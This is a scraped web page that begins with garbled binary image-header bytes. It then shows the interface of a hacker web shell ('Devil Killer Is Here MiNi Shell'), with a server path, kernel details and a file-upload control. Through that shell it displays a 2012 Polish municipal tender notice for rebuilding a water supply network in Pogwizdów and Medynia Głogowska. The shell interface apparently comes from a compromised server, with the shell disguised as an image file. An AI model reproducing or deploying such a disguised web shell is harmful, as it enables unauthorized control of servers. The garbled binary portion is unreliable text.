JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120202/32768-N-2012.html

<p class="kh_header"><b>Czarna: Przebudowa i rozbudowa sieci wodociągowej w miejscowościach Pogwizdów 
 i Medynia Głogowska wraz z remontem Stacji Uzdatniania Wody</b><br>
<b>Numer ogłoszenia: 32768 - 2012; data zamieszczenia: 02.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Czarna , Czarna 260, 37-125 Czarna, woj. podkarpackie, tel. 017 2262324, 017 2262606, faks 017 2262324 w. 232.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminaczarna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa i rozbudowa sieci wodociągowej w miejscowościach Pogwizdów 
 i Medynia Głogowska wraz z remontem Stacji Uzdatniania Wody.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przebudowę i rozbudowę sieci wodociągowej w miejscowościach Medynia Głogowska i Pogwiz-dów (Gmina Czarna)w niewielkim zakresie w miejscowości Stobierna (Gmina Trzebownisko).
Łączna długość sieci wodociągowej wraz z przyłączami - 16,893 km, w tym na terenie Gminy Czarna - 16,567 km oraz 0,326 km na terenie Stobiernej. Budowa sieci wodociągowej obejmuje 208 przyłączy w
tym 30 nowych i 178 modernizowanych (wszystkie przyłącza będą zlokalizowane na terenie Gmi-ny Czarna) oraz remont Stacji Uzdatniania Wody w miejscowości Pogwizdów.
Siec wodociągowa projektuje się z rur polietylenowych typu PE100:
PE100 SDR 17 (PN10) o średnicy 200x11,9 L = 1761,5 mb, w tym 189 mb na terenie Gminy Trzebownisko, w miejscowości Stobierna,
PE100 SDR 17 (PN10) o średnicy 160x9,5 L = 358 mb
PE100 SDR 17 (PN10) o średnicy 125x7,4 L = 4533 mb
PE100 SDR 17 (PN10) o średnicy 110x6,6 L = 2412 mb, w tym 137 mb na terenie Gminy Trze-bownisko, w miejscowości Stobierna.
PE100 SDR 17 (PN10) o średnicy 63x3,8 L = 579,5 mb
PE100 SDR 17 (PN10) o średnicy 50x3,0 L = 261,5 mb
PE100 SDR 17 (PN10) o średnicy 40x2,4 L = 1926 mb
PE100 SDR 17 (PN10) o średnicy 32x2,0 L = 1410,5 mb .
Dla zwiększenia niezawodności funkcjonowania siec została zaprojektowana w układzie obwodo-wo - rozgałęzieniowym.
Minimalne średnice na sieci ppoz. - obwodowej DN 100, rozgałęzieniowej DN 125.

siec wodociągowa zaopatrywana będzie, tak jak to miało miejsce do tej pory z ujęcia wody w Po-gwizdowie (studnia wiercona) i Stobiernej (studnia kopana Sk-1). 
W zakresie przedmiotowego przedsięwzięcia projektuje się budowę sieci wodociągowej o długo-ści 13
242 mb w tym 326 mb na terenie Gminy Trzebownisko, ilość przyłączy wodociągowych - 208 szt. (oraz odcinki wodociągu łączące istniejące wymienione przyłącza wodociągowe z siecią wodocią-gową - 16 szt) o całkowitej długości 3 651 m. Rury osłonowe dla przewiertów oraz przy przej-ściach pod drogami i rowami wykonane zostaną z materiału PE100 PN10 lub stal
 Ze względu na fakt, że istniejąca sieć wodociągowa jest stara i nie wiadomo dokładnie jakie są średnice istniejących rurociągów podczas wykonawstwa wybrana zostanie taka technika wykona-nia, aby dostosować sposób połączenia rurociągów do zaistniałych warunków.

Przyłącza wodociągowe wykonane zostaną z rur typu PE100 na ciśnienie 1,0 MPa.
Zaprojektowano 208 szt. przyłączy wodociągowych. Łączna długość przyłączy wyniesie 3651 mb:
PE100 SDR 17 (PN10) o średnicy 110x6,6 L = 11 mb
PE100 SDR 17 (PN10) o średnicy 63x3,8 L = 88,5 mb
PE100 SDR 17 (PN10) o średnicy 50x3,0 L = 47 mb
PE100 SDR 17 (PN10) o średnicy 40x2,4 L = 775,5 mb
PE100 SDR 17 (PN10) o średnicy 32x2,0 L = 2729 mb.
W ramach projektu zostanie zainstalowanych 208 szt liczników wodomierzowych.

W ramach projektu zostanie także wykonany remont zbiornika wody czystej przy SUW w Pogwizdowie obejmujący roboty branży budowlanej i instalacyjnej. 

zgodnie z  projektem budowlanym, SSTWIORB oraz przedmiarem robót.
Przedmiary robót pełnią funkcję pomocniczą..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje wykonywanie zamówień uzupełniających, stanowiących nie więcej   niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu robót określonych  w cz. III pkt 3.1. siwz.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.33.00.00-9, 45.10.00.00-0, 45.23.13.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 10.1. Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium przed upływem  terminu składania ofert w wysokości:  50 000,00 zł (słownie: pięćdziesiąt tysięcy złotych) 

10.2. Wadium może być wnoszone w jednej lub kilku następujących formach:

a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości
(Dz.U. z 2007 r. Nr 42, poz. 275).

W przypadku wnoszenia wadium w pieniądzu ustaloną kwotę należy wpłacić przelewem na rachunek bankowy Zamawiającego:
 13124026431111000037781705 bank PEKAO S.A. o-Łańcut. 

Wadium wnoszone w formie: poręczenia bankowego lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręcze-niach udzielanych przez podmioty o których mowa w art. 6b ust. 5 pkt 2 ustawy  z dnia 9 listo-pada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości, należy złożyć w formie oryginału w kasie Urzędu Gminy w Czarnej (pok. 11), kserokopię należy dołączyć do oferty.

Nie należy załączać oryginału dokumentu wadialnego do oferty.

Z treści gwarancji (poręczenia) musi jednoznacznie wynikać jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawi-ciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwaran-cji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wa-dium w okolicznościach określonych w art. 46 ust. 5 ustawy Prawo zamówień publicznych.

Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert
    W przypadku wnoszenia wadium w pieniądzu kserokopię wpłaty wadium należy dołączyć do oferty.

  Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego.
Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>to podpisanie oświadczenia z art. 22 ust.1 wg wzoru załączonego do niniejszej SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tj. wykonali, w okresie pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, zgodnie z zasadami sztuki budowlanej co najmniej 2 zamówienia odpowiadające swoim rodzajem  robotom budowlanym stanowiącym przedmiot zamówienia (roboty budowlane obejmujące swoim zakresem przebudowę, rozbudowę lub budowę sieci wodociągowych z przyłączami o długości min. 8 km)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>to podpisanie  oświadczenia z art. 22 ust.1 wg wzoru załączonego do niniejszej SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tj. dysponują lub będą dysponować osobami (osobą) posiadającymi (posiadającą) wymagane uprawnienia: do kierowana robotami w specjalności instalacyjno inżynierskiej w zakresie sieci i instalacji sanitarnych) o doświadczeniu minimum 3 lata od daty  uzyskania uprawnień.
Ocena spełnienia tego warunku będzie dokonana na podstawie załączonych do oferty następujących dokumentów:
   - wykazu osób (załącznik nr 6 do SIWZ), którymi dysponuje lub będzie dysponował   wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, z podaniem wykształcenia, stażu pracy, a także zakresu wykonywanych przez nich czynności oraz informacji o podstawie do dysponowania tymi osobami,
   - oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia (załącznik nr 7 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>to podpisanie oświadczenia z art. 22 ust.1 wg wzoru załączonego do niniejszej SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Harmonogram rzeczowo - finansowy sporządzony w oparciu o złączony wzór - załącznik nr 11. 
Kosztorys ofertowy nie jest wymagany. Zamawiający będzie żądał przed podpisaniem umowy, od Wykonawcy, który zostanie wybrany  kosztorys ofertowy uproszczony wraz z zesta-wieniem materiałów i sprzętu,  tabelę elementów scalonych, stawkę roboczogodziny, narzuty i zysk. 
2. Wykaz części zamówienia, które wykonawca zamierza powierzyć podwykonawcom 
3. Kserokopia dokumentu potwierdzającego wniesienie wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Gwarancja - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy Prawo Zamówień Publicznych zamawiający dopuszcza wprowadzenie zmian postanowień umowy w stosunku do treści oferty, na podstawie której doko-nano wyboru Wykonawcy, w następujących okolicznościach i zakresie:

1)	Termin realizacji zamówienia może być zmieniony w przypadku, gdy opóźnienie w wykonywaniu przedmiotu umowy spowodowane będzie okolicznością, która wystąpiła z przyczyn niezależnych od Wykonawcy po zawarciu umowy:
a) w przypadku powstania wyjątkowo niesprzyjających warunków atmosferycznych uniemoż-liwiających prowadzenie robót,
b) w przypadku okresowego wstrzymania robót przez Zamawiającego,
c) wystąpienia robót dodatkowych, o których mowa w art. 67 ust. 1 pkt 5 ustawy Prawo Zamó-wień   Publicznych
d) wstrzymania robót na okres dłuższy niż 3 tygodnie spowodowany wykryciem na przykład niewybuchów, niewypałów, szczątków ludzkich, wykopalisk archeologicznych, pozostałości budowli podziemnych;
     e) wstrzymania robót budowlanych przez organy administracji publicznej,
     f) Zmiany zakresu rzeczowego zamówienia, gdy ze względów społecznych, gospodarczych w trakcie realizacji inwestycji wystąpią okoliczności powodujące, że niecelowym jest wykonanie pełnego zakresu robót zgodnie z dokumentacja projektową np. zmiana Miejscowego Planu Zagospodarowania Przestrzennego,
2)	Zamawiający dopuszcza za zgodą Wykonawcy robót zmianę wartości i zakresu wykonanych robót w poszczególnych latach realizacji umowy w przypadku zwiększenia lub zmniejszenia środków finansowych w danym roku realizacji umowy.
3)	Zamawiający dopuszcza również możliwość skrócenia terminu płatności faktur końcowych w przypadku zmiany terminu wykonania umowy lub wystąpienia robót dodatkowych lub uzupełniających warunkujących wykonanie umowy na zamówienie podstawowe i w celu za-płacenia faktury w roku budżetowym, w którym umowa jest realizowana.
4)	Dopuszcza się za zgodą projektanta zmianę sposobu wykonania poszczególnych robót przy zachowaniu parametrów oraz możliwość zmiany kwoty wynagrodzenia w przypadku zasto-sowania materiałów zamiennych, innych technologii lub rozwiązań, gdy zmiana taka jest ko-rzystna dla Zamawiającego, nie spowoduje wzrostu kosztów inwestycji lub wpłynie na przy-spieszenie terminu zakończenia robót budowlanych.
5)	Jeżeli zaistnieje możliwość wykonania robót objętych niniejszą umową w terminach krót-szych niż wynikające z umowy oraz z harmonogramu prac, Zamawiający dopuszcza zmianę harmonogramu prac w sposób przewidujący skrócenie całości robót lub poszczególnych eta-pów robót;
6)	Jeżeli wystąpią uzasadnione okoliczności mające wpływ na prawidłową realizację przedmio-tu umowy Zamawiający dopuszcza zmianę harmonogramu finansowo - rzeczowego robót.
19.3. Zamawiający dopuszcza zmianę sposobu realizacji przedmiotu umowy:

1) Zamawiający dopuszcza zastosowanie innych rozwiązań technicznych, technologicznych, innych materiałów i urządzeń niż przewidziane w dokumentacji, jeżeli spełniony zostanie któ-rykolwiek z poniższych warunków:
a)zamienne materiały i urządzenia będą miały lepsze parametry techniczne, bez pogorszenia warunków eksploatacyjnych,
b)zmiany te spowodują obniżenie kosztów na eksploatację i konserwację wykonanego przed-miotu umowy bez pogorszenia parametrów technicznych materiałów i urządzeń,
c)wynikać będą z konieczności usunięcia błędów w dokumentacji lub realizacji przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych, technologicznych lub materiało-wych niż przewidziane w dokumentacji ze względu na zmiany obowiązującego prawa.
d)przyjęte w dokumentacji materiały lub urządzenia są niedostępne na rynku, zostały wycofa-ne z produkcji.

Wprowadzenie powyższych zmian na wniosek Wykonawcy wymaga pisemnej zgody inspektora nadzoru, projektanta i akceptacji Zamawiającego.

19.4. Pozostałe zmiany.
1) możliwość rozwiązania umowy bez zachowania okresu wypowiedzenia w przypadku wszczęcia postępowania upadłościowego lub otwarcia likwidacji Wykonawcy,
2) zmiana sposobu rozliczania wynagrodzenia Wykonawcy lub dokonywanie płatności na rzecz Wykonawcy na skutek zmian w zawartej przez Zamawiającego umowie o dofinansowanie projek-tu lub zmian wytycznych dotyczących realizacji projektu,
3) możliwa jest zmiana wysokości wynagrodzenia wykonawcy w przypadku rezygnacji z części robót, konieczności wykonania robót zamiennych lub robót dodatkowych, o których mowa w art. 67 ust. 1 pkt 5 ustawy Prawo Zamówień  Publicznych jeżeli będzie to niezbędne dla prawidłowej realizacji przedmiotu umowy.
